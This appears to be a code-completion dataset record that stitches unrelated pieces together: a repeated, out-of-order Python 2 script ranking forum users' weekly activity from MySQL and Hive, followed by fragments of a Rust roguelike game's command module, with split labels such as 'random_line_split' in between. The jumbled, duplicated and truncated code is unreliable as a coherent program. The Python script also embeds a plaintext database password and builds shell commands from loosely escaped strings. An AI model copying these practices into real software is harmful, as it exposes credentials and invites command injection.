dataset = sqlcursor.fetchall()
for (userid, topicnum, startopicnum) in dataset:
if userid in ignoreusers:
continue
if userid not in resultset:
resultset[userid] = {}
resultset[userid]['statis_date'] = statis_date
resultset[userid]['userid'] = int(userid)
resultset[userid]['topicnum'] = int(topicnum)
resultset[userid]['startopicnum'] = int(startopicnum)
resultset[userid]['isnewuser'] = 1 if userid in newusers else 0
sqlcursor.close()
dbconn.commit()
dbconn.close()
#计算活跃度得分
for item in resultset:
resultset[item]['score'] = getscore(resultset[item])
#计算排名(按活跃度得分从大到小排序)
resultusers, resultscores, top = [], [], 50
sortset = [(resultset[item]['score'], resultset[item]['userid']) for item in resultset]
sortset.sort(reverse=True)
for (index, item) in enumerate(sortset):
resultset[item[1]]['sn'] = index+1
if top==0 or index<top:
resultusers.append(str(item[1]))
resultscores.append(str(item[0]))
#推送第1次
if postmode:
logger.debug("sending data (1)...")
#简化结果集(格式与推送接口约定保持一致)
simpleset, top = {}, 50
simpleset['gid'] = 'user_rank'
simpleset['users'] = []
for item in resultset:
if top>0 and resultset[item]['sn']>top:
continue
simpleitem = {}
simpleitem['uid'] = resultset[item]['userid']
simpleitem['rank'] = resultset[item]['sn']
simpleitem['score'] = resultset[item]['score']
simpleset['users'].append(simpleitem)
simpledata = json.dumps(simpleset)
#推送
posturl = 'http://211.151.151.230/data/userrank'
httpconn = httplib.HTTPConnection(urlparse(posturl).netloc, timeout=10)
headers = {'Host':'search.haodou.com', 'Accept-Charset':'UTF-8'}
postdata = simpledata
logger.info("postdata: %s" % postdata)
try:
httpconn.request(method='POST',url=urlparse(posturl).path,body=postdata,headers=headers);
httpresp = httpconn.getresponse()
httpstatus, httpreason, httptext = httpresp.status, httpresp.reason, httpresp.read()
httpconn.close()
if httpresp.status!=httplib.OK:
logger.error('数据发送失败!(1)')
logger.error("Debug Info: %s %s - %s" % (httpstatus, httpreason, httptext))
except (httplib.HTTPException, socket.error) as ex:
logger.error("网络错误:%s" % ex)
#推送第2次
if postmode:
logger.debug("sending data (2)...")
posturl = 'http://211.151.151.230/data/top'
httpconn = httplib.HTTPConnection(urlparse(posturl).netloc, timeout=10)
headers = {'Host':'search.haodou.com', 'Accept-Charset':'UTF-8'}
postdata = "category=user&type=grpactive&cache=0&ids=%(users)s&counts=%(scores)s" % {'url':urlparse(posturl).path, 'users':','.join(resultusers), 'scores':','.join(resultscores)}
posturl = "%(url)s?%(data)s" % {'url':urlparse(posturl).path, 'data':postdata}
logger.info("postdata: %s" % postdata)
try:
httpconn.request(method='POST',url=posturl,body=postdata,headers=headers);
httpresp = httpconn.getresponse()
httpstatus, httpreason, httptext = httpresp.status, httpresp.reason, httpresp.read()
httpconn.close()
if httpresp.status!=httplib.OK:
logger.error('数据发送失败!(2)')
logger.error("Debug Info: %s %s - %s" % (httpstatus, httpreason, httptext))
except (httplib.HTTPException, socket.error) as ex:
logger.error("网络错误:%s" % ex)
#输出结果集格式定义(与结果表bing.rpt_grp_weekactrank_dm 结构一致)
fieldsdelimiter, rowsdelimiter = '\t', '\n'
resultrowformat = \
"%(user_id)s" + fieldsdelimiter + \
"%(topic_num)d" + fieldsdelimiter + \
"%(startopic_num)d" + fieldsdelimiter + \
"%(comment_num)d" + fieldsdelimiter + \
"%(commentnum_web)d" + fieldsdelimiter + \
"%(commentnum_app)d" + fieldsdelimiter + \
"%(score)d" + fieldsdelimiter + \
"%(sn)d" + rowsdelimiter
#输出结果集文件
logger.debug("writing file ...")
resultchunk, top = [], 0
for item in resultset:
if top>0 and resultset[item]['sn']>top:
continue
resultline = resultrowformat % { \
'user_id':resultset[item]['userid'], \
'topic_num':resultset[item].get('topicnum',0), \
'startopic_num':resultset[item].get('startopicnum',0), \
'comment_num':resultset[item].get('commentnum',0), \
'commentnum_web':resultset[item].get('commentnum_web',0), \
'commentnum_app':resultset[item].get('commentnum_app',0), \
'score':resultset[item]['score'], \
'sn':resultset[item]['sn'] \
}
resultchunk.append(resultline)
tmpfilename = "rpt_grp_memberweekactrank_dm_%(statisdate)s.dat" % {'statisdate':statisdate}
tmpfile = "%(dir)s/%(tmpfilename)s" % {'dir':tmpdir, 'tmpfilename':tmpfilename}
tmpwriter = open(tmpfile,'w')
tmpwriter.writelines(resultchunk)
tmpwriter.close()
#加载入Hive表
logger.debug("loading hive ...")
runHiveQL("load data local inpath '%(tmpfile)s' overwrite into table bing.rpt_grp_memberweekactrank_dm partition (statis_date='%(statis_date)s');" % {'tmpfile':tmpfile, 'statis_date':statis_date})
#为展现附加一个提供了名字的hive表
sqlstmt = r"""
set hive.auto.convert.join=false;
insert overwrite table bing.rpt_grp_memberweekactrank_dm_name partition (statis_date='%(statis_date)s')
select
t.user_id,
u.username,
t.topic_num,
t.startopic_num,
t.comment_num,
t.commentnum_web,
t.commentnum_app,
t.score,
t.sn
from (select * from bing.rpt_grp_memberweekactrank_dm where statis_date='%(statis_date)s') t
inner join haodou_passport_%(rundate)s.`User` u on (t.user_id=u.userid)
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statis_date':statis_date \
}
runHiveQL(sql)
logger.info("end.(%d)" % retval)
sys.exit(retval) | random_line_split | |
memberweekactrank.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os, datetime, time
import logging
from optparse import OptionParser
import string, codecs
import subprocess
import MySQLdb
import json, phpserialize
import httplib, urllib, socket
from urlparse import urlparse
import re
def mklogfile(s):
if not os.path.exists(s):
f=open(s,'w')
f.write('.log\n')
f.close()
os.chmod(s, 0666)
def isdate(s):
try:
time.strptime(str(s).replace('-',''),'%Y%m%d')
return True
except:
return False
def isnum(s):
ret = re.match(r'[+-]?\d*[\.]?\d*$', s)
return True if ret!=None else False
def getweekfirstday(dt):
try:
return dt + datetime.timedelta(days=1-dt.isoweekday())
except:
return None
def getweeklastday(dt):
try:
return dt + datetime.timedelta(days=7-dt.isoweekday())
except:
return None
def isweekend(s):
try:
return datetime.datetime.strptime(s,'%Y%m%d').isoweekday() == 7
except:
return False
def ismonthend(s):
try:
return (datetime.datetime.strptime(s,'%Y%m%d') + datetime.timedelta(days=1)).day == 1
except:
return False
def delbom(s):
if s[0]==codecs.BOM_UTF8:
return s[1:]
else:
return s
def delctrlchr(s, cc = '\n\t\r'):
return str(s).translate(string.maketrans(cc,' '*len(cc)))
def sqlEscape(s):
try:
ret = str(s).replace('\\','\\\\')
ret = ret.replace('`','\\`')
return ret
except:
return None
def runHiveQL(s):
logger.debug("sql# %s" % s)
cmd = 'hive -S -e "%(sql)s"' % {'sql':sqlEscape(s)}
proc = subprocess.Popen(cmd, shell=True, env=os.environ, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
hiveout, errmsg = proc.communicate()
retval = proc.wait()
if retval!=0:
logger.error("HiveError!!!(%d)" % retval)
logger.error("Debug Info: %s" % str(errmsg))
sys.exit(retval)
return hiveout
def getscore(t):
|
reload(sys)
sys.setdefaultencoding('utf8')
retval = 0
##运行时变量
pid = os.getpid()
rundate = datetime.date.today().strftime("%Y%m%d")
rundir = os.path.dirname(os.path.abspath(__file__))
runfilename = os.path.splitext(os.path.split(os.path.abspath(__file__))[1])[0]
logdir = rundir + '/log'
tmpdir = rundir + '/tmp'
if not os.path.exists(logdir):
os.mkdir(logdir,0777)
if not os.path.exists(tmpdir):
os.mkdir(tmpdir,0777)
logfile = '%(dir)s%(sep)s%(filename)s.log' % {'dir':logdir,'sep':os.sep,'filename':runfilename,'rundate':rundate,'pid':pid}
if not os.path.exists(logfile):
mklogfile(logfile)
##日志器
logger = logging.getLogger('task')
logger.setLevel(logging.DEBUG)
fileHandler = logging.FileHandler(logfile)
fileHandler.setLevel(logging.INFO)
fileHandler.setFormatter(logging.Formatter("%(asctime)s\tpid#%(process)d\t%(levelname)s - %(message)s"))
logger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler()
consoleHandler.setLevel(logging.INFO)
consoleHandler.setFormatter(logging.Formatter("%(asctime)s\tpid#%(process)d\t%(filename)s\n%(message)s"))
logger.addHandler(consoleHandler)
logger.info("begin execute... %s" % str(sys.argv))
##参数解析
usageinfo = "%prog [--date=statisdate] [--post] [-v]"
parser = OptionParser(usage=usageinfo, version="%prog v0.1.0")
parser.set_defaults(statisdate=(datetime.datetime.strptime(rundate,'%Y%m%d')+datetime.timedelta(days=-1)).strftime('%Y%m%d'))
parser.add_option('-d', '--date', dest='statisdate', help='statis date, yyyy-mm-dd or yyyymmdd', metavar='DATE')
parser.add_option('-p', '--post', action='store_true', dest='postmode', default=False, help='post mode', metavar='MODE')
parser.add_option('-v', '--verbose', action='store_true', dest='verbosemode', default=False, help='verbose mode', metavar='MODE')
(options, args) = parser.parse_args()
statisdate = options.statisdate.replace('-','')
postmode = options.postmode
verbosemode = options.verbosemode
#参数检查
if verbosemode:
consoleHandler.setLevel(logging.DEBUG)
if not isdate(statisdate):
logger.error("unconverted date %s" % statisdate)
sys.exit(-101)
#日期变量
dt_statisdate = datetime.datetime.strptime(statisdate,'%Y%m%d')
statis_date = dt_statisdate.strftime('%Y-%m-%d')
statis_week = getweekfirstday(dt_statisdate).strftime('%Y-%W')
statisweek_firstday = getweekfirstday(dt_statisdate).strftime('%Y-%m-%d')
statisweek_lastday = getweeklastday(dt_statisdate).strftime('%Y-%m-%d')
preday90_date = (dt_statisdate+datetime.timedelta(days=-90)).strftime("%Y-%m-%d")
#指标权重系数配置
c_topicnum, c_commentnum, c_startopicnum, c_isnewuser = range(4)
INDEX_FACTOR = [2.0, 1.0, 0.5, 50.0]
c_default, c_app, c_web = range(3)
SOURCE_FACTOR = [1.0, 1.2, 0.8]
WEIGHTS = []
for index in INDEX_FACTOR:
row = []
for source in SOURCE_FACTOR:
row.append(index*source)
WEIGHTS.append(row)
resultset = {}
#数据来源
logger.debug("connecting mysql ...")
dbconn = MySQLdb.connect(host='10.0.10.85',user='bi',passwd='bi_haodou',port=3306,charset='utf8')
sqlcursor = dbconn.cursor()
#获取小组管理员。小组管理员不纳入小组成员排名
sqlstmt = r"""
select GroupAdmins as admin1, ManageMaster as admin2, ManageSlave as admin3
from haodou_center.GroupCate
where parentid!=0
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
ignoreusers = []
for (admin1, admin2, admin3) in dataset:
if admin1 is not None:
admin = phpserialize.loads(admin1.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
if admin2 is not None:
admin = phpserialize.loads(admin2.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
if admin3 is not None:
admin = phpserialize.loads(admin3.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
logger.debug("ignoreusers: %s" % ignoreusers)
#获取新用户。3个月内注册
sqlstmt = r"""
select userid
from haodou_passport.User
where status=1 and regtime>'%(preday90_date)s 00:00:00'
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday, \
'preday90_date':preday90_date \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
newusers = []
for row in dataset:
newusers.append(row[0])
#计算回复指标
sqlstmt = r"""
select ut.userid as userid,
count(uc.commentid) as commentnum,
count(case when uc.sourceid=0 then uc.commentid end) as commentnum_web,
count(case when uc.sourceid in (1,2) then uc.commentid end) as commentnum_app
from
(select commentid, userid, itemid as topicid, Platform as sourceid
from haodou_comment.Comment
where createtime between '%(statisweek_firstday)s 00:00:00' and '%(statisweek_lastday)s 23:59:59'
and type = '6' and status = '1'
) uc,
haodou_center.GroupTopic ut
where uc.topicid=ut.topicid
group by ut.userid
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
for (userid, commentnum, commentnum_web, commentnum_app) in dataset:
if userid in ignoreusers:
continue
if userid not in resultset:
resultset[userid] = {}
resultset[userid]['statis_date'] = statis_date
resultset[userid]['userid'] = int(userid)
resultset[userid]['commentnum'] = int(commentnum)
resultset[userid]['commentnum_web'] = int(commentnum_web)
resultset[userid]['commentnum_app'] = int(commentnum_app)
resultset[userid]['isnewuser'] = 1 if userid in newusers else 0
#计算话题指标
sqlstmt = r"""
select
userid,
count(topicid) as topicnum,
count(case when digest=1 or recommend=1 then topicid end) as startopicnum
from haodou_center.GroupTopic
where createtime between '%(statisweek_firstday)s 00:00:00' and '%(statisweek_lastday)s 23:59:59'
and status='1'
group by userid
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
for (userid, topicnum, startopicnum) in dataset:
if userid in ignoreusers:
continue
if userid not in resultset:
resultset[userid] = {}
resultset[userid]['statis_date'] = statis_date
resultset[userid]['userid'] = int(userid)
resultset[userid]['topicnum'] = int(topicnum)
resultset[userid]['startopicnum'] = int(startopicnum)
resultset[userid]['isnewuser'] = 1 if userid in newusers else 0
sqlcursor.close()
dbconn.commit()
dbconn.close()
#计算活跃度得分
for item in resultset:
resultset[item]['score'] = getscore(resultset[item])
#计算排名(按活跃度得分从大到小排序)
resultusers, resultscores, top = [], [], 50
sortset = [(resultset[item]['score'], resultset[item]['userid']) for item in resultset]
sortset.sort(reverse=True)
for (index, item) in enumerate(sortset):
resultset[item[1]]['sn'] = index+1
if top==0 or index<top:
resultusers.append(str(item[1]))
resultscores.append(str(item[0]))
#推送第1次
if postmode:
logger.debug("sending data (1)...")
#简化结果集(格式与推送接口约定保持一致)
simpleset, top = {}, 50
simpleset['gid'] = 'user_rank'
simpleset['users'] = []
for item in resultset:
if top>0 and resultset[item]['sn']>top:
continue
simpleitem = {}
simpleitem['uid'] = resultset[item]['userid']
simpleitem['rank'] = resultset[item]['sn']
simpleitem['score'] = resultset[item]['score']
simpleset['users'].append(simpleitem)
simpledata = json.dumps(simpleset)
#推送
posturl = 'http://211.151.151.230/data/userrank'
httpconn = httplib.HTTPConnection(urlparse(posturl).netloc, timeout=10)
headers = {'Host':'search.haodou.com', 'Accept-Charset':'UTF-8'}
postdata = simpledata
logger.info("postdata: %s" % postdata)
try:
httpconn.request(method='POST',url=urlparse(posturl).path,body=postdata,headers=headers);
httpresp = httpconn.getresponse()
httpstatus, httpreason, httptext = httpresp.status, httpresp.reason, httpresp.read()
httpconn.close()
if httpresp.status!=httplib.OK:
logger.error('数据发送失败!(1)')
logger.error("Debug Info: %s %s - %s" % (httpstatus, httpreason, httptext))
except (httplib.HTTPException, socket.error) as ex:
logger.error("网络错误:%s" % ex)
#推送第2次
if postmode:
logger.debug("sending data (2)...")
posturl = 'http://211.151.151.230/data/top'
httpconn = httplib.HTTPConnection(urlparse(posturl).netloc, timeout=10)
headers = {'Host':'search.haodou.com', 'Accept-Charset':'UTF-8'}
postdata = "category=user&type=grpactive&cache=0&ids=%(users)s&counts=%(scores)s" % {'url':urlparse(posturl).path, 'users':','.join(resultusers), 'scores':','.join(resultscores)}
posturl = "%(url)s?%(data)s" % {'url':urlparse(posturl).path, 'data':postdata}
logger.info("postdata: %s" % postdata)
try:
httpconn.request(method='POST',url=posturl,body=postdata,headers=headers);
httpresp = httpconn.getresponse()
httpstatus, httpreason, httptext = httpresp.status, httpresp.reason, httpresp.read()
httpconn.close()
if httpresp.status!=httplib.OK:
logger.error('数据发送失败!(2)')
logger.error("Debug Info: %s %s - %s" % (httpstatus, httpreason, httptext))
except (httplib.HTTPException, socket.error) as ex:
logger.error("网络错误:%s" % ex)
#输出结果集格式定义(与结果表bing.rpt_grp_weekactrank_dm 结构一致)
fieldsdelimiter, rowsdelimiter = '\t', '\n'
resultrowformat = \
"%(user_id)s" + fieldsdelimiter + \
"%(topic_num)d" + fieldsdelimiter + \
"%(startopic_num)d" + fieldsdelimiter + \
"%(comment_num)d" + fieldsdelimiter + \
"%(commentnum_web)d" + fieldsdelimiter + \
"%(commentnum_app)d" + fieldsdelimiter + \
"%(score)d" + fieldsdelimiter + \
"%(sn)d" + rowsdelimiter
#输出结果集文件
logger.debug("writing file ...")
resultchunk, top = [], 0
for item in resultset:
if top>0 and resultset[item]['sn']>top:
continue
resultline = resultrowformat % { \
'user_id':resultset[item]['userid'], \
'topic_num':resultset[item].get('topicnum',0), \
'startopic_num':resultset[item].get('startopicnum',0), \
'comment_num':resultset[item].get('commentnum',0), \
'commentnum_web':resultset[item].get('commentnum_web',0), \
'commentnum_app':resultset[item].get('commentnum_app',0), \
'score':resultset[item]['score'], \
'sn':resultset[item]['sn'] \
}
resultchunk.append(resultline)
tmpfilename = "rpt_grp_memberweekactrank_dm_%(statisdate)s.dat" % {'statisdate':statisdate}
tmpfile = "%(dir)s/%(tmpfilename)s" % {'dir':tmpdir, 'tmpfilename':tmpfilename}
tmpwriter = open(tmpfile,'w')
tmpwriter.writelines(resultchunk)
tmpwriter.close()
#加载入Hive表
logger.debug("loading hive ...")
runHiveQL("load data local inpath '%(tmpfile)s' overwrite into table bing.rpt_grp_memberweekactrank_dm partition (statis_date='%(statis_date)s');" % {'tmpfile':tmpfile, 'statis_date':statis_date})
#为展现附加一个提供了名字的hive表
sqlstmt = r"""
set hive.auto.convert.join=false;
insert overwrite table bing.rpt_grp_memberweekactrank_dm_name partition (statis_date='%(statis_date)s')
select
t.user_id,
u.username,
t.topic_num,
t.startopic_num,
t.comment_num,
t.commentnum_web,
t.commentnum_app,
t.score,
t.sn
from (select * from bing.rpt_grp_memberweekactrank_dm where statis_date='%(statis_date)s') t
inner join haodou_passport_%(rundate)s.`User` u on (t.user_id=u.userid)
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statis_date':statis_date \
}
runHiveQL(sql)
logger.info("end.(%d)" % retval)
sys.exit(retval)
| return int(t.get('topicnum',0)*WEIGHTS[c_topicnum][c_default] + \
t.get('commentnum',0)*WEIGHTS[c_commentnum][c_default] + \
t.get('startopicnum',0)*WEIGHTS[c_startopicnum][c_default] + \
t.get('isnewuser',0)*WEIGHTS[c_isnewuser][c_default]
) | identifier_body |
command.rs | use std::fmt::Display;
use GameContext;
use data::Walkability;
use engine::keys::{Key, KeyCode};
use ecs::traits::*;
use graphics::cell::{CellFeature, StairDest, StairDir};
use logic::Action;
use logic::entity::EntityQuery;
use point::{Direction, Point};
use world::traits::*;
use world::{self, World};
use super::debug_command::*;
pub type CommandResult<T> = Result<T, CommandError>;
pub enum CommandError {
Bug(&'static str),
Invalid(&'static str),
Debug(String),
Cancel,
}
/// A bindable command that can be executed by the player.
pub enum Command {
Move(Direction),
UseStairs(StairDir),
Look,
Pickup,
Drop,
Inventory,
Wait,
Quit,
DebugMenu,
Teleport,
}
impl From<Key> for Command {
fn from(key: Key) -> Command {
match key {
Key { code: KeyCode::Escape, .. } => Command::Quit,
Key { code: KeyCode::Left, .. } |
Key { code: KeyCode::H, .. } |
Key { code: KeyCode::NumPad4, .. } => Command::Move(Direction::W),
Key { code: KeyCode::Right, .. } |
Key { code: KeyCode::L, .. } |
Key { code: KeyCode::NumPad6, .. } => Command::Move(Direction::E),
Key { code: KeyCode::Up, .. } |
Key { code: KeyCode::K, .. } |
Key { code: KeyCode::NumPad8, .. } => Command::Move(Direction::N),
Key { code: KeyCode::Down, .. } |
Key { code: KeyCode::J, .. } |
Key { code: KeyCode::NumPad2, .. } => Command::Move(Direction::S),
Key { code: KeyCode::B, .. } |
Key { code: KeyCode::NumPad1, .. } => Command::Move(Direction::SW),
Key { code: KeyCode::N, .. } |
Key { code: KeyCode::NumPad3, .. } => Command::Move(Direction::SE),
Key { code: KeyCode::Y, .. } |
Key { code: KeyCode::NumPad7, .. } => Command::Move(Direction::NW),
Key { code: KeyCode::U, .. } |
Key { code: KeyCode::NumPad9, .. } => Command::Move(Direction::NE),
Key { code: KeyCode::Period, .. } => Command::UseStairs(StairDir::Ascending),
Key { code: KeyCode::Comma, .. } => Command::UseStairs(StairDir::Descending),
Key { code: KeyCode::M, .. } => Command::Look,
Key { code: KeyCode::G, .. } => Command::Pickup,
Key { code: KeyCode::D, .. } => Command::Drop,
Key { code: KeyCode::I, .. } => Command::Inventory,
Key { code: KeyCode::E, .. } => Command::Teleport,
Key { code: KeyCode::F1, .. } => Command::DebugMenu,
_ => Command::Wait,
}
}
}
pub fn process_player_command(context: &mut GameContext, command: Command) -> CommandResult<()> {
match command {
// TEMP: Commands can still be run even if there is no player?
Command::Quit => Err(CommandError::Invalid("Can't quit.")),
Command::Look => cmd_look(context),
Command::UseStairs(dir) => cmd_use_stairs(context, dir),
Command::Pickup => cmd_pickup(context),
Command::Drop => cmd_drop(context),
Command::Inventory => cmd_inventory(context),
Command::Move(dir) => cmd_player_move(context, dir),
Command::Wait => cmd_add_action(context, Action::Wait),
Command::DebugMenu => cmd_debug_menu(context),
Command::Teleport => cmd_teleport(context),
}
}
fn cmd_player_move(context: &mut GameContext, dir: Direction) -> CommandResult<()> {
// Check if we're bumping into something interactive, and if so don't consume a turn.
let position = player_pos(context)?;
let new_pos = position + dir;
let npc_opt = context.state.world.find_entity(
new_pos,
|e| context.state.world.is_npc(*e),
);
if let Some(npc) = npc_opt {
mes!(
context.state.world,
"{}: Hello!",
a = npc.name(&context.state.world)
);
return Ok(());
}
cmd_add_action(context, Action::MoveOrAttack(dir))
}
fn cmd_add_action(context: &mut GameContext, action: Action) -> CommandResult<()> {
context.state.add_action(action);
Ok(())
}
fn cmd_look(context: &mut GameContext) -> CommandResult<()> |
fn cmd_teleport(context: &mut GameContext) -> CommandResult<()> {
mes!(context.state.world, "Teleport where?");
let pos = select_tile(context, |_, _| ())?;
if context.state.world.can_walk(
pos,
Walkability::MonstersBlocking,
)
{
cmd_add_action(context, Action::Teleport(pos))
} else {
Err(CommandError::Invalid("The way is blocked."))
}
}
fn cmd_pickup(context: &mut GameContext) -> CommandResult<()> {
let first_item;
{
let world = &context.state.world;
let pos = player_pos(context)?;
first_item = world.find_entity(pos, |&e| world.ecs().items.has(e))
}
match first_item {
Some(item) => cmd_add_action(context, Action::Pickup(item)),
None => Err(CommandError::Invalid("You grab at air.")),
}
}
fn cmd_drop(context: &mut GameContext) -> CommandResult<()> {
let player = context.state.world.player().ok_or(CommandError::Bug(
"No player in the world!",
))?;
let items = context.state.world.entities_in(player);
let names = items.iter().map(|i| i.name(&context.state.world)).collect();
let idx = menu_choice(context, names).ok_or(CommandError::Cancel)?;
cmd_add_action(context, Action::Drop(items[idx]))
}
fn cmd_inventory(context: &mut GameContext) -> CommandResult<()> {
let player = context.state.world.player().ok_or(CommandError::Bug(
"No player in the world!",
))?;
let items = context.state.world.entities_in(player);
let names = items.into_iter()
.map(|i| {
context.state.world.ecs().names.get(i).unwrap().name.clone()
})
.collect();
let choose = menu_choice_indexed(context, names)?;
mes!(context.state.world, "You chose: {}", a = choose);
Err(CommandError::Cancel)
}
fn find_stair_dest(world: &World, pos: Point, dir: StairDir) -> CommandResult<StairDest> {
let cell = world.cell_const(&pos).ok_or(CommandError::Bug(
"World was not loaded at stair pos!",
))?;
match cell.feature {
Some(CellFeature::Stairs(stair_dir, dest)) => {
if stair_dir != dir {
return Err(CommandError::Cancel);
}
debug!(world.logger, "STAIR at {}: {:?}", pos, dest);
Ok(dest)
},
_ => Err(CommandError::Cancel),
}
}
fn player_pos(context: &GameContext) -> CommandResult<Point> {
let world = &context.state.world;
let player = world.player().ok_or(
CommandError::Bug("No player in the world!"),
)?;
let pos = world.position(player).ok_or(CommandError::Bug(
"Player has no position!",
))?;
Ok(pos)
}
fn cmd_use_stairs(context: &mut GameContext, dir: StairDir) -> CommandResult<()> {
let pos = player_pos(context)?;
let world = &mut context.state.world;
let next = find_stair_dest(world, pos, dir)?;
let (true_next, dest) = load_stair_dest(world, pos, next)?;
world.move_to_map(true_next, dest).unwrap();
debug!(world.logger, "map id: {:?}", world.map_id());
Ok(())
}
fn load_stair_dest(
world: &mut World,
stair_pos: Point,
next: StairDest,
) -> CommandResult<(World, Point)> {
match next {
StairDest::Generated(map_id, dest) => {
debug!(world.logger, "Found stair leading to: {:?}", map_id);
let world = world::serial::load_world(map_id).map_err(|_| {
CommandError::Bug("Failed to load already generated world!")
})?;
Ok((world, dest))
},
StairDest::Ungenerated => {
debug!(world.logger, "Failed to load map, generating...");
let res = {
generate_stair_dest(world, stair_pos)
};
debug!(
world.logger,
"new stairs: {:?}",
world.cell_const(&stair_pos)
);
res
},
}
}
fn generate_stair_dest(world: &mut World, stair_pos: Point) -> CommandResult<(World, Point)> {
let mut new_world = World::new()
.from_other_world(world)
.with_prefab("rogue")
.with_prefab_args(prefab_args!{ width: 100, height: 50, })
.build()
.map_err(|_| CommandError::Bug("Failed to generate stair!"))?;
let prev_id = world.flags().map_id;
let dest_id = new_world.flags().map_id;
let mut stairs_mut = world.cell_mut(&stair_pos).unwrap();
if let Some(CellFeature::Stairs(stair_dir, ref mut dest @ StairDest::Ungenerated)) =
stairs_mut.feature
{
let new_stair_pos = new_world.find_stairs_in().ok_or(CommandError::Bug(
"Generated world has no stairs!",
))?;
*dest = StairDest::Generated(dest_id, new_stair_pos);
new_world.place_stairs(stair_dir.reverse(), new_stair_pos, prev_id, stair_pos);
Ok((new_world, new_stair_pos))
} else {
Err(CommandError::Bug(
"Stairs should have already been found by now...",
))
}
}
use glium::glutin::{VirtualKeyCode, ElementState};
use glium::glutin;
use graphics::Color;
use point::LineIter;
use renderer;
fn maybe_examine_tile(pos: Point, world: &mut World) {
if let Some(mob) = world.mob_at(pos) {
if let Some(player) = world.player() {
if player.can_see_other(mob, world) {
mes!(world, "You see here a {}.", a = mob.name(world));
}
}
}
}
fn draw_targeting_line(player_pos: Option<Point>, world: &mut World) {
let camera = world.flags().camera;
if let Some(player_pos) = player_pos {
draw_line(player_pos, camera, world);
}
}
fn draw_line(start: Point, end: Point, world: &mut World) {
world.marks.clear();
for pos in LineIter::new(start, end) {
world.marks.add(pos, Color::new(255, 255, 255));
}
world.marks.add(end, Color::new(255, 255, 255));
}
/// Allow the player to choose a tile.
pub fn select_tile<F>(context: &mut GameContext, callback: F) -> CommandResult<Point>
where
F: Fn(Point, &mut World),
{
let mut selected = false;
let mut result = context.state.world.flags().camera;
let player_pos = context.state
.world
.player()
.map(|p| context.state.world.position(p))
.unwrap_or(None);
renderer::with_mut(|rc| {
draw_targeting_line(player_pos, &mut context.state.world);
rc.update(context);
rc.start_loop(|renderer, event| {
match event {
glutin::Event::KeyboardInput(ElementState::Pressed, _, Some(code)) => {
println!("Key: {:?}", code);
{
let world = &mut context.state.world;
match code {
VirtualKeyCode::Up => world.flags_mut().camera.y -= 1,
VirtualKeyCode::Down => world.flags_mut().camera.y += 1,
VirtualKeyCode::Left => world.flags_mut().camera.x -= 1,
VirtualKeyCode::Right => world.flags_mut().camera.x += 1,
VirtualKeyCode::Escape => return Some(renderer::Action::Stop),
VirtualKeyCode::Return => {
selected = true;
return Some(renderer::Action::Stop);
},
_ => (),
}
let camera = world.flags().camera;
result = camera;
callback(camera, world);
draw_targeting_line(player_pos, world);
}
renderer.update(context);
},
_ => (),
}
None
});
});
context.state.world.marks.clear();
if selected {
Ok(result)
} else {
Err(CommandError::Cancel)
}
}
use renderer::ui::layers::ChoiceLayer;
pub fn menu_choice(context: &mut GameContext, choices: Vec<String>) -> Option<usize> {
renderer::with_mut(|rc| {
rc.update(context);
rc.query(&mut ChoiceLayer::new(choices))
})
}
pub fn menu_choice_indexed<T: Display + Clone>(
context: &mut GameContext,
mut choices: Vec<T>,
) -> CommandResult<T> {
let strings = choices.iter().cloned().map(|t| t.to_string()).collect();
let idx = menu_choice(context, strings).ok_or(CommandError::Cancel)?;
Ok(choices.remove(idx))
}
use renderer::ui::layers::InputLayer;
pub fn player_input(context: &mut GameContext, prompt: &str) -> Option<String> {
renderer::with_mut(|rc| {
rc.update(context);
rc.query(&mut InputLayer::new(prompt))
})
}
| {
select_tile(context, maybe_examine_tile).map(|_| ())
} | identifier_body |
command.rs | use std::fmt::Display;
use GameContext;
use data::Walkability;
use engine::keys::{Key, KeyCode};
use ecs::traits::*;
use graphics::cell::{CellFeature, StairDest, StairDir};
use logic::Action;
use logic::entity::EntityQuery;
use point::{Direction, Point};
use world::traits::*;
use world::{self, World};
use super::debug_command::*;
pub type CommandResult<T> = Result<T, CommandError>;
pub enum CommandError {
Bug(&'static str),
Invalid(&'static str),
Debug(String),
Cancel,
}
/// A bindable command that can be executed by the player.
pub enum Command {
Move(Direction),
UseStairs(StairDir),
Look,
Pickup,
Drop,
Inventory,
Wait,
Quit,
DebugMenu,
Teleport,
}
impl From<Key> for Command {
fn from(key: Key) -> Command {
match key {
Key { code: KeyCode::Escape, .. } => Command::Quit,
Key { code: KeyCode::Left, .. } |
Key { code: KeyCode::H, .. } |
Key { code: KeyCode::NumPad4, .. } => Command::Move(Direction::W),
Key { code: KeyCode::Right, .. } |
